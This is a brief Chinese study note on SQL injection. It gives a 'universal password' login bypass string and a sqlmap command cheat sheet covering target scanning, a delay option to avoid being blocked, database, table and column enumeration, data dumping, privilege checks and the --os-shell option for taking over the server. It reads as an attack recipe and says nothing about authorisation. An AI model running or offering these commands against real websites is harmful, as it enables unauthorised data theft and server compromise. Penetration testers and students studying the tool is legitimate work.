安装编程语言安装后需要环境变量(python java)
万能密码 ' or 1=1 -- qwe'
1.sqlmap
sqlmap 自动化测试sql注入的工具
启用sqlmap时 直接在所属文件夹 输入cmd 回车 调出终端(不建议单独设置一个环境变量)
然后在终端输入python sqlmap.py 即可运行sqlmap
python sqlmap.py -u 网址
即可进行漏洞扫描 为了防止访问速度过快而被封 可以加一条延时语句
python sqlmap.py -u 网址 --delay=1
在传参数量多于一个时 会sqlmap自动选择最后一个 如果要指定传参 -p 参数名
注意 多传参时 要给网址“括起来
sqlmap跑完会有缓存 缓存会直接读取 不会去测试
在末尾加上 --flush-session 即可无视缓存跑
找到漏洞后 结尾加 -dbs 查看库名 --tables 查看表 ---columns 查看字段
-D 指定库 后加库名
-T 指定表 后加表名
-C 指定字段
--dump 获取数据(脱裤)
--is-dba 检测权限(true可试下行命令)
--os-shell 获取服务器权限(很少能执行)
sqlmap测试分等级 等级越高测试越慢 测出漏洞的概率也越大(level 1-5 risk1-3)
一般用 --level 3 --risk 2